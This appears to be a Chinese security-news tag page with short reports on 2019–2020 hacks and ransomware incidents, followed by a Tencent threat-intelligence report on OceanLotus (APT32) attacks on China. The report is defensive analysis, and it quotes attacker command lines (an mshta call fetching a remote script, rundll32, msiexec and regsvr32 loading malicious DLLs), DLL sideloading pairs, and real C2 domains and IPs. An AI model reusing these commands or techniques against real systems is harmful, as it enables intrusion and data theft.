标签: 黑客攻击

外媒评俄罗斯攻击 Burisma 一事:证据不完全可靠

据外媒报道,2016年美国民主党全国委员会灾难性的黑客攻击给所有担心国际混乱竞选的人敲响了警钟。当地时间周一晚,美国人又有了一个担心2020年大选的新理由。《纽约时报》和网络安全公司Area1报道了俄罗斯情报机构针对乌克兰天然气公司Burisma发起的新一轮黑客攻击。 几个月来,共和党方面一直在暗示该公司内部存在一些可怕的腐败行为,如果俄罗斯间谍真的侵入了这家公司的网络那么可能就会带来非常可怕的后果。 一些国会议员则已经在预测2016年大选将会重演,民主党众议员Adam Schiff评论道:“看起来他们又想帮助这位总统(特朗普)。这是一个令人担忧的想法,考虑到特朗普上次拒绝承认俄罗斯的黑客行为,没有迹象表明白宫会采取任何措施来阻止它。” 尽管报告描绘了一幅可怕的画面,但证据并不像看上去那么确凿。虽然已经有强有力的证据表明Burisma成功地成为了网络钓鱼活动的目标,但很难确定是谁在背后支持这个活动。确实有迹象表明,俄罗斯的GRU情报机构可能参与其中,但证据大多是间接的。 据了解,大部分证据都在一份跟《纽约时报》文章一起发布的八页报告中。核心证据是以前针对Hudson Institute和George Soros的攻击模式。最糟糕的是,这些钓鱼活动都使用了相同的SSL供应商和相同URL的不同版本然后伪装成一个名为“My Sharepoint”的服务。在Area1看来,这是GRU的战术,Burisma只是众多目标中最新的一个。 但并不是所有人都认为基于域名属性的推断就是十拿九稳的。当Kyle Ehmke检查ThreatConnect相同模式的早期迭代时,他得出了一个更为慎重的结论,即“适度自信”地评估这些域名跟APT28有关–APT28是俄罗斯GRU的缩写。“我们看到了一致性,但在某些情况下,这些一致性并不适用于单个演员,”Ehmke告诉TheVerge。这种注册和网络钓鱼攻击的模式确实像是GRU的剧本,但它不是唯一的剧本也不是其利用的唯一剧本。 实际上,这意味着网络运营商应该在任何时候发现符合这种情况的攻击时发出警报,但要对单个事件做出明确的裁决就显得困难得多。竞选活动中使用的网络基础设施都是公开的,而且还被其他很多政党使用,所以这些都不能算是确凿的证据。而最显著的特征是术语“sharepoint”,研究人员只在跟GRU紧密相连的url中看到过这个词。但任何人都可以注册一个带有“sharepoint”的URL,所以这种连接只是间接的。 Ehmke指出:“这是一组值得注意的一致性,它可以用来寻找和识别他们的基础设施。但这并不是说所有具有这些一致性的东西都已经是而且将会是APT28。” 在缺乏一个特定机构的战略和目标的具体信息的情况下很难做出更强的归因。走向相反的方向–从一个弱归因到一个意图的假设–可能是危险的。 令人沮丧的是,这种弱归因在网络安全世界中非常常见,当各国努力搞清楚网络战的国际外交时它可能会引发真正的问题。乔治亚理工学院Internet Governance Project前执行董事Farzaneh Badii把原因不明归为“可以在技术上受到质疑的间接证据”。她认为这是一个全球性的问题,并主张成立国际归因小组来解决这种僵局,这样观察员就不必依赖私营公司或政府情报机构。如果没有这个信任问题就很难解决。   (稿源:cnBeta,封面源自网络。)

科威特国家新闻社 Twitter 账号遭黑客攻击 被用来传播有关美军从该国撤离的虚假消息

据外媒The Verge报道,科威特国家新闻社(KUNA)周三表示,其Twitter帐户遭到黑客攻击,并被用来散布有关美军撤出该国的虚假信息。据路透社报道,现已删除的报告指出,科威特国防部长已收到美国的一封信,信中称驻科威特美军将在三天内离开该国。 该新闻社在后续的推文中说,其“绝对否认”在其社交媒体账户上发布的报道,科威特新闻部正在调查这一问题。 在伊朗将军苏莱曼尼被杀之后,有消息称美国发出了一封信,暗示该国将撤离伊拉克,但随后五角大楼官员迅速澄清该文件是错误发送的草稿信件。 目前尚不清楚谁是制造这起黑客入侵事件的罪魁祸首。   (稿源:cnBeta,封面源自网络。)

黑客攻破美国一政府网站 贴出特朗普被打流血图片

据外媒报道,黑客成功侵入美国一个政府网站,并在上面发布了一张美国总统唐纳德·特朗普脸被打嘴里流着血的图片。美国土安全局的一名官员证实,该网站隶属于联邦存储图书馆计划(FLDP),不过该图片现在已被撤下。 这个被攻击的网站向用户展示了一个黑色页面,其中包括特朗普被打的照片以及一条声称黑客组织是代表“伊朗伊斯兰共和国”行事的信息。 “我们不会停止支持我们在该地区的朋友:巴勒斯坦被压迫的人民、也门被压迫的人民、叙利亚人民和政府、伊拉克人民和政府、巴林被压迫的人民、黎巴嫩和巴勒斯坦真正的圣战者抵抗;(他们)总是得到我们的支持。”信息写道。 据了解,网站上的特朗普流血图跟最近导致Qassem Soleimani少将死亡的美国空袭有着直接的关系。 尽管该信息表明伊朗黑客是幕后黑手,但美国官员称在这方面还没有明确证据。“我们知道联邦存储图书馆计划(FDLP)的网站被亲伊朗、反美国的信息所破坏。目前还没有证据表明这是伊朗国家支持的行动者所为。(目前)该网站已被关闭,无法访问。CISA正在跟FDLP以及我们的联邦伙伴一起监控情况。”   (稿源:cnBeta,封面源自网络。)

Sodinokibi 攻击了加州 IT 服务提供商 Synoptek 并获得赎金

Synoptek 是一家总部位于美国加利福尼亚州的IT管理和云托管服务提供商,其在前段时间遭遇了Sodinokibi勒索软件攻击,并向其支付了赎金以解密其文件。 最近几周,Sodinokibi 勒索软件在美国的攻击行动异常活跃,去年12月,美国主要数据中心提供商之一CyrusOne也遭到了该勒索软件的打击。 Synoptek 拥有的客户超过1100个,包括地方政府,金融服务,医疗保健,制造业,媒体,零售和软件。 感染时间发生在12月23日,黑客首先入侵了公司网络,然后安装了勒索软件。 该公司证实了此次攻击,但没有说明是否会向黑客支付赎金。 “12月23日发生了勒索事件,但我们对此采取了应对措施。” Synoptek在周五美国东部时间下午6点之前在推文中写道,“我们立即采取了行动,并正在与客户一起努力解决这个问题。” Synoptek首席执行官蒂姆·布里特(Tim Britt)在一封电子邮件中告诉 CRN,此次攻击仅影响到了Synoptek的部分客户。Britt 称其员工在26号圣诞假期结束之前已经解决了大多数客户的问题。 Sodiniokibi团伙似乎专注于针对美国IT提供商。该恶意软件于2019年8月感染了PercSoft公司,并于12月感染了Complete Technology Solutions的系统。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

马斯特里赫特大学遭勒索攻击:几乎所有 Windows 系统都瘫痪

马斯特里赫特大学(Maastricht University)成为了勒索软件的最新受害者,黑客于圣诞节前夕(12月23日)入侵并破坏了该大学的Windows系统。这家位于荷兰的大学在12月24日发布的公告中表示,几乎所有Windows系统都感染了勒索软件,电子邮件系统影响尤为严重。 在12月27日发布的后续更新中,该大学工作人员日夜不停地进行恢复工作。并解释称团队已经付出最大努力,希望最大程度地减少对教育、科研人员以及学生的影响。在公告中并未提及黑客部署的勒索软件类型,也不确定黑客是否已经获得了数据访问权限,并且在被勒索软件感染之前提取了相关信息。 在最初的公告中写道:“马斯特里赫特大学(UM)正在研究解决方案。UM正在调查网络攻击者是否有权访问此数据。目前尚不清楚UM需要多少时间来找到解决方案,但是,要使这些系统再次完全投入运行,肯定会需要一段时间。” 马斯特里赫特大学解释说,它已经向执法部门提交了一份报告,目前正在与专家合作进行进一步调查,并在袭击发生后进行康复。“自发现攻击以来,UM的IT人员以及该领域的外部专家一直在全力以赴。当前阶段主要是进行相关调查和维护工作。而且团队正在开发解决方案,确保大学未来能够收到更全面的保护,免受此类攻击。” 团队表示:“为了尽可能安全地工作,UM暂时将所有系统脱机处理。一切目的都是为了让学生和员工尽快(可能分阶段)访问系统。考虑到攻击的规模和程度,尚无法指出何时可以准确地做到。目前也无法确认哪些系统受到影响那些没有,这需要进一步的调查。”   (稿源:cnBeta,封面源自网络。)

泰国一监狱闭路系统遭黑客攻击 被放上网络进行直播

援引外媒报道,泰国南部春蓬府一所监狱的闭路监控电视系统遭到黑客攻击,随后在YouTube网站上进行现场直播。目前官方并未公布有关黑客入侵的具体细节,不过当地警方表示是因为收到曾在直播视频中出镜的记者报告才发现的。 根据美联社报道,黑客以BigBrother’s Gaze的名字在YouTube上进行视频直播,持续了数小时时间。在直播视频中显示了多个安全监控摄像头,由此可以相信黑客可以访问整个监控系统。 泰国当局在随后发表的声明中表示,南部春蓬府Lang Suan监狱所属的摄像头系统受到境外黑客攻击而受到损害,但是并没有提供本次黑客攻击行为的更多信息,尚不清楚是谁发起了本次攻击,以及是如何攻入该监狱系统的。 泰国惩教署总干事纳拉特·萨瓦塔南上校表示,在监狱相关官员意识到这个问题之后立即采取了行动,关闭了整个监控系统。目前当地警方已经在调查中。美联社表示,在YouTube直播频道中错误的表示这些视频来自于曼谷监狱,但圣诞节当天已经被YouTube清理掉了。在撰写本文时,该YouTube频道没有任何录像,很可能是帐户所有者删除了该录像。 该频道写道:“我想向那些可能因我的直播而冒犯的人致歉。事实上这并没有入侵行为,所有摄像头机位均来自于公共领域。附言:可能让你失望的是,该频道可能不会再次出现此类内容。再附言:在安装视频监控器时,请更改标准密码。”   (稿源:cnBeta,封面源自网络。)

黑客攻击飞机维修网络导致阿拉斯加部分航班取消

网络黑客发起了一次针对RavnAir航空公司的网络攻击,最终导致飞机维修等关键系统关闭,迫使RavnAir航空公司取消了在阿拉斯加的一系列航班。KTUU的一份报告显示,这次恶意网络攻击是在周六被发现的,但是这份报告没有提供发起攻击的黑客具体细节。然而,有6家航班被取消,大约有260名乘客受到直接影响。 当RavnAir航空公司发现攻击之后,它立即采取行动,关闭了飞机维修系统。它表示,所有Dash 8飞机的航班都被取消。该公司在一份声明中说:“我们将在未来两天内努力增加航班数量。我们尽可能帮助受影响的乘客改订其他航班。”目前,RavnAir航空公司正在与FBI和网络安全专家合作,以恢复系统并调查网络攻击。 本月早些时候,一名前Jet2 IT承包商在访问关键系统并删除数据,导致航空公司网络下线12个小时后,被判处10个月监禁。该人使用他在公司工作期间获得的凭据,连接到关键系统并删除了所有用户帐户。这位27岁男子还设法闯入了Jet2首席执行官Steve Heapey电子邮件帐户。他的网络攻击造成了16万5千英镑的损失。   (稿源:cnBeta,封面源自网络。)

加拿大医疗实验室 LifeLabs 被黑客攻击 现决定支付赎金换回用户数据

LifeLabs是一家位于加拿大、业内领先的医疗诊断和测试服务提供商。今天该公司宣布向黑客支付赎金,以赎回上月安全泄露事件中被窃取的数据和资料。在新闻稿中写道:“通过熟悉网络攻击和谈判的网络专家,我们和这些网络犯罪分子进行交易。” 目前尚不清楚公司为恢复这些数据支付了多少费用。外媒ZDNet通过电话联系LifeLabs发言人时,表示不会立即对此事发表评论。LifeLabs此前表示本次泄露事件覆盖加拿大将近半数人口,超过1500万人的资料可能已经泄露。 多数受影响客户在安大略省(Ontario)和卑诗省(British Columbia)。LifeLabs 指出,安全专家经过调查,包括监视暗网和其他网络地址,并未看到任何客户资料遭公开披露。 安大略省、卑诗省的资安专员毕米希(Brian Beamish)和麦克沃伊(Michael McEvoy)表示,他们在11 月1 日已被告知这起事件,现正联合进行调查,称攻击规模“非常令人担忧”。     (稿源:cnBeta,封面源自网络。)  

施耐德修复了 Modicon 和 EcoStruxure 产品中的 DoS 漏洞

施耐德电气公司近期解决了Modicon M580,M340,Quantum和Premium控制器中的DoS漏洞,并表示这三个缺陷都是由于检查不当造成的。 这三个漏洞是: 第一个是CVE-2019-6857,CVSS v3.0 的基本评分为 7.5,具有高危险性。使用Modbus TCP读取特定的存储器块时,该漏洞可能导致控制器遭遇DoS攻击。 CVE-2019-6856,CVSS v3.0 评分同样为 7.5,具有高危险性。在使用Modbus TCP编写特定的物理内存块时可能会导致DoS 攻击。 第三个漏洞编号为CVE-2018-7794,CVSS v3.0 评分为 5.9,为中度危险。当使用Modbus TCP读取的数据的索引无效时,该漏洞可能导致DoS攻击。 来自Nozomi Networks的Mengmeng Young和Gideon Guo(CVE-2019-6857),Chansim Deng(CVE-2019-6856)和Younes Dragoni(CVE-2018-7794)已报告了漏洞。 施耐德还告知其用户,EcoStruxure下有三个产品( Power SCADA Operation 的电源监控软件等)出现了多个漏洞。 根据Applied Risk的报告,漏洞源于一个严重堆栈溢出漏洞,黑客可以利用该漏洞触发DoS。 报告还指出:“Schneider ClearSCADA出现了一个文件权限引发的漏洞。黑客由此可以修改系统配置和数据文件。” 施耐德电气还发现了EcoStruxure Control Expert编程软件中的一个中级漏洞(该软件为Modicon可编程自动化控制器提供服务),该漏洞可能使黑客绕过软件与控制器之间的身份验证过程。     消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

“海莲花”(OceanLotus) 2019 年针对中国攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/OA09fndsHfpLVxeo7DnjYg   一、概述 “海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国大陆的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织,甚至没有之一。 腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告,在报告发布之后一直到现在,我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛,包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取。 此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉,如刚出个税改革时候,就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。 而从攻击的手法上看,相对第一季度变化不是太大,但有一些小的改进,包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看,依然采用电子邮件投递诱饵的方式,一旦获得一台机器的控制权后,立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱,只要攻击目标存在价值,攻击会越来越猛烈,对抗也会越来越激烈。 有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告,请参考: https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf 二、攻击特点 2.1  钓鱼邮件的迷惑性 海莲花组织擅长使用鱼叉攻击,通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年,持续对多个目标不断的进行攻击,如下列钓鱼邮件: 从邮件主题来看,大部分邮件主题都非常本土化,以及贴近时事热点。邮件主题包括: 《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示(待审)》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。 我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件,不过在之后的攻击中并未再次发现使用该类型诱饵: 此外,投递钓鱼邮件的账号均为网易邮箱,包括126邮箱和163邮箱,账号样式为:名字拼音+数字@163(126).com,如: Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。 2.2  诱饵类型的多样化 海莲花组织所使用的诱饵类型众多,能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞(CVE-2018-20250)的压缩包等类型外,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。 可执行文件诱饵: Chm诱饵: 白加黑诱饵: 带有宏的恶意office文档: 恶意lnk: 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包: 2.3  载荷执行方式多变 由于诱饵的多样化,载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。 1、 直接执行可执行文件 如该诱饵,伪装为word图标的可执行文件,并在文件描述里修改成了Microsoft DOCX,用于迷糊被钓鱼者。执行恶意文件后,会释放诱饵文档2019年5月标准干部培训课程通知.docx,并且打开,让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档,诱使受害者启用文档中的宏代码以查看文档内容,实际上启用宏之后,仍然看不到正常的内容: 2、 使用rundll32加载恶意dll 如某诱饵在执行后,会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:”C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register 3、 宏 使用宏来执行载荷,且宏代码经过的混淆处理: 4、 Office内存执行恶意shellcode 使用宏代码,在office中直接解密shellcode,在内存中创建线程执行: 5、 dll侧加载(白加黑) 使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。 其中所使用的宿主文件对包括: 白文件原名 黑dll文件名 iTunesHelper.exe AppVersions.dll SGTool.exe Inetmib1.dll Rar.exe ldvptask.ocx GoogleUpdate.exe goopdate.dll 360se.exe chrome_elf.dll Winword.exe wwlib.dll rekeywiz.exe mpr.dll wps.exe krpt.dll wechat.exe WeChatWin.dll 6、 通过com技术执行 通过com技术,把某恶意dll注册为系统组建来执行: 7、 Chm内嵌脚本 Chm执行后,会提示执行ActiveX代码: 其脚本内容为: 不过由于编码处理的问题,该chm打开后为乱码: 而通过手动解压后,原始内容如下: 8、 使用计划任务进行持久性攻击 如上面的chm诱饵执行后,会在%AppData%\Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务: 命令行为:C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll bcdsrv.dll为真正的恶意文件。 9、 lnk调用mstha执行 该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》: 执行lnk后,会调用命令:C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。 10、 使用odbcconf.exe加载文件: odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截: 11、WinRAR ACE(CVE-2018-20250)漏洞 带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)释放一个自解压文件: 该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行: 2.4  多重载荷攻击 我们在最新的攻击活动中,我们首次发现海莲花使用了多重载荷的攻击。 之前的攻击活动中,都是解密shellcode后,就直接执行最终的RAT,如: 而在最新的攻击活动中,我们发现,解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT: 这样使得攻击活动更加的丰富和多样性,并且也可控。 2.5  与安全软件对抗激烈 海莲花也采用了多种对抗安全软件的方式,主要为: 1、 dll的侧加载(白加黑) 该技术上面已详细描述,这里不再赘述。 2、 使用系统文件来执行: 如odbcconf.exe 3、 Office中直接内存执行shellcode 上文也已经描述,这里也不再展开。 4、 添加垃圾数据以扩充文件大小 为了防止该文件被安全厂商收集,海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。 如某文件,填充垃圾数据后,文件大小高达61.4 MB (64,480,256 字节): 5、 每台机器的第二阶段后门都是定制的 每台机器的第二阶段后门文件都是根据当前机器的机器属性(如机器名)来加密定制的,因此每台机器上的文件hash都是不一样,且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉,只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。 6、 通信的伪装 如某次攻击中C2的伪装:根据配置信息,可进行不同的连接和伪装,对C2进行拼装后再进行解析。拼接方式为(xxx为配置C2): {rand}.xxx www6.xxx cdn.xxx api.xxx HTTP Header的伪装: 2.6  定制化的后门 使用定制化的后门(主要是第二阶段下发的后门),海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光:针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。 该后门最终使用白加黑的方式来执行,包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、 XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等组合来执行。 加密流程为: 可以看到,某次针对国家某单位的攻击中,使用的密钥为: 而该受害的用户名为Cao**,可见该木马只专门为了感染该电脑而特意生成的。 2.7  多种恶意软件的选择 从我们的长期跟踪结果来看,海莲花组织使用最终的恶意软件(无论是第一阶段后门还是第二阶段后门)主要有三种,分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多,而修改版的Gh0st则比较少见。 CobaltStrike: Denis: 修改版Gh0st: 2.8  持续的内网渗透 通过钓鱼攻击攻陷一台主机后,海莲花还会不断对被攻击的内网进行渗透攻击活动,以此来渗透到更多的内网机器: 扫描: 获取hash: 打包文件: 此外,还会还会通过powershell,创建计划任务来下载持久化的工具: 最终的恶意文件为goopdate.dll,跟上文所述的第二阶段下发后门一致。 三、可能存在的假旗活动 在跟踪海莲花的过程中,我们还发现了一些跟海莲花活动类似的攻击: 如: 可以看出该批活动跟海莲花的类似:如关键字、使用白加黑等。 而该文件最终的执行的恶意代码为两种: 一种是CobaltStrike生成的Beacon payload; 另一种是metasploit生成的block_reverse_http的paylaod。 虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用,但是之前未发现有metasploit生成的payload,这似乎跟之前的海莲花攻击活动又有些不一致。 此外该批活动的c2都在中国境内(包括中国香港),这似乎跟之前的攻击活动也不大一样: 虽然这波活动在极力模仿海莲花的一些攻击行为,但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗(false flag)活动。因此在这先不做定论,等待更多的证据和关联的依据。 四、总结 海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织,甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光,该组织并未有停手迹象,反而不断更新其技术和武器库,包括诱饵、payload、新的漏洞利用等,此外也有众多跟杀软的对抗手段,如自增文件大小、混淆方式、定制化的payload等。 因此我们提醒相关部门和相关人员,切记提高安全意识,不要随意执行来历不明的邮件的附件,不要被钓鱼信息所蒙蔽。 五、安全建议 1、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码; 2、 及时安装操作系统补丁和Office等重要软件的补丁; 3、 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险; 4、 推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 六、附录 6.1  腾讯御见威胁情报中心 腾讯御见威胁情报中心,是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托腾讯安全在海量安全大数据上的优势,通过机器学习、顶尖安全专家团队支撑等方法,产生包括高级持续性攻击(APT)在内的大量安全威胁情报,帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。 腾讯御见威胁情报中心公众号自开号以来,发布了大量的威胁分析报告,包括不定期公开的针对中国大陆目标的APT攻击报告,无论是分析报告的数量上还是分析报告的质量上,都处于业界领先水平,受到了大量客户和安全专家的好评,同时发布的情报也经常被政府机关做为安全预警进行公告。 以下是腾讯御见威胁情报中心公众号的二维码,关注请扫描二维码: 6.2  IOCs MD5: e7920ac10815428de937f2fca076b94c 4095b9682af13ca1e897ca9cc097ec69 b96de3d0023542f8624b82b9773373e9 5c5f8c80dcb3283afeb092cb0c13a58a c90c7abcee1d98a8663904d739185d16 d249411f003d05c0cea012c11ba13716 3489140891e67807c550aa91c67dc4ad 22f8736bbc96c1a58ab07326d730a235 dade969b00cbc4a0c1b58eeb0e740b63 3c3b2cc9ff5d7030fb01496510ac75f2 d604c33d6ec99a87a672b3202cb60fa7 861fc5624fd1920e9d9cc7a236817dd7 8e2b5b95980cf52e99acfa95f5e1570b 3c8b2d20e428f8207b4324bb58f5d228 a81424e973b310edd50aed37590f4b8a cf5d6d28c388edf58e55412983cf804a 6b8bec74620fbf88263b48c5a11b682e 9eb55481a0b5fcd255c8fb8de1042f88 5c00063b11c4710fe5a5a1adaf208b12 d30bc57624d233d94dc53a62908ef2df 886d0dd67e4cf132a1aed84263d661e3 2b3c5c831eb6b921ac128c4d44d70a7a 1dfb41e5919af80c7d0fa163a90e21e5 C&C: 360skylar.host wechats.asis news.shangrilaexports.com clip.shangweidesign.com jcdn.jsoid.com libjs.inquirerjs.com baidu-search.net sys.genevrebreinl.com ad.ssageevrenue.com tel.caitlynwells.com us.melvillepitcairn.com upgrade.coldriverhardware.com cdnwebmedia.com 43.251.100.20 43.254.217.67 114.118.80.233 6.3  MITRE ATT&CK Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1204 User Execution T1223 Compiled HTML File T1053 Scheduled Task T1117 Regsvr32 Persistence T1179 Hooking T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder Defense Evasion T1107 File Deletion T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp T1117 Regsvr32 Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1005 Data from Local System T1025 Data from Removable Media T1123 Audio Capture T1056 Input Capture T1113 Screen Capture T1115 Clipboard Data Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 6.4  参考链接 https://s.tencent.com/research/report/715.html